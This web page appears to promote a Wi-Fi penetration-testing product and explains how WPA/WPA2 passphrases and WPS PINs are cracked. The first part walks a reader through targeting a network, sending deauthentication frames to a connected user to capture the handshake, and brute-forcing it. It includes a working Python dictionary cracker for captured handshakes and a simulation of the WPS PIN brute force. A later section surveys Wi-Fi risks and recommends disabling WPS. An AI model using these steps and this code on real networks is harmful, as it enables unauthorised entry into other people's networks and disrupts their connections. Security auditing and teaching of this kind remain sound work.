Wi-Fi WPA - WPA2 & WPS Encryption Cracking Guide
How attackers break into WiFi access points.
A more recent vulnerability in WPS (Wi-Fi Protected Setup) shows that many routers are fundamentally vulnerable.
WPS allows attackers to brute force the router's 8-digit PIN.
The WPS functionality is enabled from the factory in most routers from TP-Link, D-Link, Zyxel, Huawei, Linksys and others.
Due to poor design, the router confirms each half of the PIN separately, and most routers do not limit failed attempts.
Because the last digit is only a checksum, an attacker can therefore guess the PIN in at most about 11,000 attempts,
where a blind search of an 8-digit PIN would have taken up to 100,000,000 attempts.
This means an attacker can usually recover the PIN, and with it the WPA/WPA2 passphrase, in a matter of hours.
1. First of all, connect a high-gain antenna (for example 8 dBi) for the best possible range and start the Wi-Fi scan.
- Once the audit is running, you will see the WEP, WPA and WPA2 networks in the target list. Check the signal strength of the access point you want to target.
- A signal strength of at least 15 (as reported by the scanner) is advised to reliably capture the handshake of the targeted WPA or WPA2 network.
- Cracking a WPA or WPA2 network is different from cracking WEP: there is no statistical weakness in the cipher to exploit, so it will not finish in a matter of minutes.
- Instead, you need to capture the 4-way handshake of a legitimate client connecting to the WPA or WPA2 network and then brute force the passphrase offline against that capture.
- Portable Penetrator assists with this by providing faster cracking (claimed 300%) and large dictionaries in many languages.
- There are two ways to get the handshake.
- The handshake is exchanged whenever a client connects to the Wi-Fi network, so it can be captured passively at that moment.
- If no users are connected you must be patient and wait for someone to connect, then capture the WPA or WPA2 handshake that can be cracked.
- Without a handshake, the passphrase cannot be cracked.
- If one or several users are connected to the WPA or WPA2 network, simply select the network and target one of the users.
- From there, send a short burst of deauthentication frames to that client to force it to disconnect and reconnect.
- The reconnection produces the handshake, which is captured.
- Usually the user does not notice anything during the attack.
- When you have the handshake, cracking begins with the selected dictionaries.
- A good CPU-based crack runs at around 1,300 keys per second, which adds up to millions of candidates in a few hours; the rate is bounded by the 4,096 PBKDF2 iterations needed to derive each candidate key, not by the size of the capture.
- If the password is not found in the selected dictionary, select another dictionary file.
- It is highly recommended to use a dictionary for the target's language, or a large (1 gigabyte or more) dictionary file, to improve the chance of success.
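The capture-and-crack loop the steps above describe, written out as an added Python example (this is not Portable Penetrator's code). For each dictionary word it derives the PMK with PBKDF2-HMAC-SHA1, expands it to the PTK with the 802.11 PRF, and compares the resulting MIC with the one carried in the captured EAPOL message 2, which is exactly the check a WPA/WPA2 dictionary attack performs per candidate. Because no capture is embedded in the page, the handshake is constructed in build_message2 from an SSID, MAC addresses, nonces and passphrase chosen here; those values, WORDLIST and all function names are assumptions for illustration, while the key derivation and MIC computation follow the standard.

```python
"""Offline WPA/WPA2-PSK dictionary attack on a captured 4-way handshake.

Per candidate: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds) -> PTK =
PRF-512(PMK, MACs, nonces) -> KCK = PTK[:16] -> MIC over message 2's EAPOL-Key
frame. The candidate is right when the MIC matches the captured one.
"""
import hashlib
import hmac
import time
from dataclasses import dataclass
from typing import Iterable, Optional

# Key MIC offset in an EAPOL-Key frame: 4-byte EAPOL header, then descriptor
# type(1) key info(2) key length(2) replay counter(8) nonce(32) IV(16) RSC(8)
# ID(8) = 77 bytes of key descriptor before the 16-byte MIC.
MIC_OFFSET = 81


@dataclass(frozen=True)
class Handshake:
    ssid: bytes
    ap_mac: bytes      # authenticator MAC (6 bytes)
    client_mac: bytes  # supplicant MAC (6 bytes)
    anonce: bytes      # 32-byte nonce from message 1
    snonce: bytes      # 32-byte nonce from message 2
    eapol: bytes       # complete EAPOL-Key frame of message 2, MIC included
    key_version: int   # 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1 (WPA2/CCMP)


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """Pairwise Master Key: 4096 rounds of PBKDF2-HMAC-SHA1 salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512: expand the PMK into the 64-byte PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    """MIC over the frame with its MIC field zeroed; first 16 bytes of the HMAC."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def check_passphrase(hs: Handshake, passphrase: str) -> bool:
    """True if this passphrase reproduces the captured MIC."""
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    ptk = prf512(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)
    captured = hs.eapol[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(ptk[:16], hs.eapol, hs.key_version), captured)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack. WPA passphrases are 8..63 characters; other words are skipped."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if 8 <= len(word) <= 63 and check_passphrase(hs, word):
            return word
    return None


def keys_per_second(hs: Handshake, candidates: int = 200) -> float:
    """Single-core guess rate, the figure cracking tools report as keys/s."""
    start = time.perf_counter()
    for i in range(candidates):
        check_passphrase(hs, f"candidate{i:08d}")
    return candidates / (time.perf_counter() - start)


def build_message2(ssid, ap_mac, client_mac, anonce, snonce, passphrase) -> Handshake:
    """Constructed WPA2/CCMP message 2, built the way a supplicant would; it stands
    in for a real capture because no pcap is embedded in the page."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK
    body = (b"\x02"                   # descriptor type: RSN EAPOL-Key
            + b"\x01\x0a"             # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"             # key length 16 (CCMP)
            + (1).to_bytes(8, "big")  # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + b"\x00" * 16            # MIC placeholder, filled below
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key
    ptk = prf512(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], frame, 2)
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce,
                     frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:], 2)


# Constructed sample (not a real capture): SSID, MACs, nonces and passphrase chosen here.
SAMPLE = build_message2(b"HomeNet", bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"),
                        bytes(range(32)), bytes(range(32, 64)), "Summer2013!")
WORDLIST = ["123456", "letmein1", "password", "qwertyuiop", "Summer2013!", "correcthorse"]

if __name__ == "__main__":
    print("recovered:", crack(SAMPLE, WORDLIST))
    print(f"rate: {keys_per_second(SAMPLE):.0f} keys/s")
```

Run as a script it recovers the constructed passphrase and prints the per-core rate; with 4,096 PBKDF2 iterations per candidate that rate lands in the low thousands per second on a modern CPU, which is why the quality of the dictionary matters more than anything else and why a long random passphrase is out of reach of this attack. The PMK derivation can be checked against the IEEE 802.11 test vector (passphrase "password", SSID "IEEE").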
For support, please contact the support team, which can help with more instructions for password recovery.
With Portable Penetrator WiFi Pen Testing Software you can audit your encrypted WiFi networks for WPA/WPA2, WPS and WEP weaknesses.
Learn to secure your WiFi before it gets hacked by wardriving black hat hackers.
WiFi Security Utopia - WPA2 WPA WEP Keys
WiFi networks (WLANs) are now, in many locations, more common than the old-fashioned cabled Internet connection. Installing cables in a building or office can often be an expensive and slow task. It may even require authorized technicians to run the cables through walls and to have the installation certified afterwards.
Another issue is cables that are not long enough,
or holes that must be drilled in walls when a new room needs cabling. This again requires installation certification, time and cost.
A cable can also simply break if someone has it connected to a laptop and another person walks by and trips over it.
This could damage the laptop and break the connector, which would then need to be replaced.
Another issue is that if a cable is bent too hard, the wires inside can break and require repair.
A further limitation is that a user with a laptop who wants to move from room to room, or to a different place in the room, can only go where there is a cable socket, which limits the user's freedom.
A simple solution to the cabling challenges is wireless technology. Wireless networks have been around for many years but have only caught on in the last few years, after most laptop vendors started delivering laptops with built-in WiFi; earlier, the user had to deal with an external PCMCIA card or USB adapter.
Today the ever-increasing number of smartphones and sub-notebooks that ship with WiFi as their only network interface creates an even greater need for WiFi networks.
The flexibility is that a user can easily connect to the network through walls or even floors without any cables.
The user can move between departments in the organization and still be connected, and can even be abroad or at a coffee shop and still be connected.
We could now all take a rest, since connectivity freedom via the WiFi utopia has been reached!
As with most new technologies, what is introduced to solve one problem also introduces new areas of concern or risk.
There are many concerns, risks and security problems with WiFi technology. One could even argue that the technology was introduced too fast, without enough scrutiny from a security point of view.
Key risk areas that have arisen while using wireless networks
• WiFi disturbance.
There have been cases where 2.4 GHz and 5.8 GHz networks were easily disturbed
and blocked from functioning.
Even common cordless phones are known to interfere, as are microwave ovens.
An attacker within radio range can even buy a WiFi jammer online and easily block entire WiFi networks. So if an organization relies solely on WiFi technology, it can be very vulnerable to a DoS (Denial of Service) attack.
• The encryption schemes used for Wi-Fi networks have been broken over and over again.
The first one, WEP (Wired Equivalent Privacy), was already broken in 2001, and numerous further flaws have been found in it since.
• MAC address protection.
Wi-Fi router manufacturers introduced MAC address filtering, allowing only whitelisted MAC addresses to connect. However, an attacker can spoof a MAC address in seconds and connect anyway.
• Sniffing of traffic is a problem when multiple users are connected to an access point. Users may feel it is secure, but in reality other people on the same access point can sniff passwords for websites and mail services if they are used without HTTPS.
There have even been plugins for Firefox and other browsers (Firesheep being the best known) that let anyone on the same network take over other people's Facebook sessions.
• The more secure WPA was introduced in 2003 as a replacement for WEP, followed by WPA2 in 2004.
On a WPA/WPA2 encrypted network an attacker can still cause a DoS against users by sending deauthentication packets, forcing the users to reconnect, and in this way capture the connection handshake. Once the attacker has the handshake, it can be brute forced offline, quickly and distributed across many machines.
This can lead to the compromise of a network thought to be secure.
• WPA TKIP (Temporal Key Integrity Protocol) injection vulnerability.
It is possible to decrypt short packets.
This does not lead to recovery of the passphrase, but to recovery of the keystream used to encrypt a packet.
This can allow an attacker to inject forged ARP packets, for example to redirect the victim's outgoing Internet traffic.
• WPS PIN key recovery. This is a very serious vulnerability disclosed in December 2011.
If a target access point has the Wi-Fi Protected Setup (WPS) feature enabled, it can be attacked. It does not matter which encryption is used or how strong the passphrase is, because a router that accepts the PIN hands the WPA/WPA2 passphrase to the registrar.
Many access points come from the manufacturer with the function enabled by default, straight out of the box.
It allows an attacker to recover the WPS PIN, sometimes in a few hours or a few days, and with it the router's WPA/WPA2 passphrase.
• MS-CHAPv2 vulnerability. In 2012 a weakness was discovered in MS-CHAPv2 (used inside PEAP on WPA/WPA2 Enterprise networks) that reduces breaking a captured exchange to a single DES key search, which is feasible with modern hardware.
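The PIN search described in the introduction and in the WPS PIN key recovery bullet, as an added simulation in Python (not code from any router vendor or from Portable Penetrator). SimulatedEnrollee plays the access point and answers the registrar's M4 and M6 messages the way a router without attempt limiting does: a NACK as soon as the first half of the PIN is wrong, and a NACK after M6 when the second half is wrong, so the two halves are searched independently and the worst case is 10,000 + 1,000 sessions instead of 10,000,000. brute_force_pin plays the external registrar. The PIN 47135826, the passphrase, the lockout_after parameter and all names here are assumptions for illustration; the checksum rule is the one WPS specifies.

```python
"""Simulation of the WPS external-registrar PIN brute force (disclosed Dec 2011).

The 8-digit PIN's last digit is a checksum. The AP (enrollee) validates
digits 1-4 after M4 and digits 5-8 after M6, answering NACK on failure, so
a registrar can guess each half separately: at most 10^4 + 10^3 sessions.
"""
from typing import Optional, Tuple


def wps_checksum(pin7: int) -> int:
    """Checksum digit appended to the first seven digits of a WPS PIN."""
    acc = 0
    while pin7:
        acc += 3 * (pin7 % 10)
        pin7 //= 10
        acc += pin7 % 10
        pin7 //= 10
    return (10 - acc % 10) % 10


class SimulatedEnrollee:
    """Access point side of WPS registration (constructed stand-in for a router).

    Holds the secret PIN and the WPA2 passphrase it hands out in M7.
    lockout_after=None models the factory default (no limit on failed
    attempts); a number models an AP that refuses further registrar
    sessions after that many failures.
    """

    def __init__(self, pin: str, passphrase: str, lockout_after: Optional[int] = None):
        if len(pin) != 8 or not pin.isdigit():
            raise ValueError("WPS PIN must be 8 digits")
        if wps_checksum(int(pin[:7])) != int(pin[7]):
            raise ValueError("bad WPS PIN checksum")
        self._first, self._second = pin[:4], pin[4:]
        self._passphrase = passphrase
        self._lockout_after = lockout_after
        self._first_ok = False
        self.sessions = 0
        self.failures = 0

    def locked(self) -> bool:
        return self._lockout_after is not None and self.failures >= self._lockout_after

    def m1(self) -> str:
        """Start a new registration session (M1..M3 carry no PIN material)."""
        self.sessions += 1
        self._first_ok = False
        return "NACK" if self.locked() else "M1"

    def m4(self, first_half: str) -> str:
        """Registrar proves digits 1-4; AP replies M5 or NACK."""
        if self.locked():
            return "NACK"
        self._first_ok = first_half == self._first
        if not self._first_ok:
            self.failures += 1
        return "M5" if self._first_ok else "NACK"

    def m6(self, second_half: str) -> Tuple[str, Optional[str]]:
        """Registrar proves digits 5-8; AP replies M7 with the passphrase, or NACK."""
        if self.locked() or not self._first_ok or second_half != self._second:
            self.failures += 1
            return "NACK", None
        return "M7", self._passphrase


def brute_force_pin(ap: SimulatedEnrollee) -> Optional[Tuple[str, str, int]]:
    """Return (pin, passphrase, sessions used), or None if the AP locked us out."""
    first = None
    for i in range(10_000):                      # phase 1: digits 1-4
        guess = f"{i:04d}"
        if ap.m1() == "NACK":
            return None
        if ap.m4(guess) == "M5":
            first = guess
            break
    if first is None:
        return None
    for j in range(1_000):                       # phase 2: digits 5-7 plus checksum
        second = f"{j:03d}" + str(wps_checksum(int(first + f"{j:03d}")))
        if ap.m1() == "NACK" or ap.m4(first) != "M5":
            return None
        reply, passphrase = ap.m6(second)
        if reply == "M7":
            return first + second, passphrase, ap.sessions
    return None


if __name__ == "__main__":
    # Constructed secret: seven digits 4713582 plus their checksum digit 6.
    print(brute_force_pin(SimulatedEnrollee("47135826", "S3cretHomeNet!")))
    print(brute_force_pin(SimulatedEnrollee("47135826", "S3cretHomeNet!", lockout_after=3)))
```

With the constructed PIN the full recovery takes 5,297 registration sessions, and even the worst case is 11,000; at a few seconds per session that is the "few hours" the bullet mentions. Setting lockout_after shows why a router that locks WPS after a few failures defeats this simulation; real routers that only lock temporarily merely slow the attack down, so disabling WPS is the reliable fix.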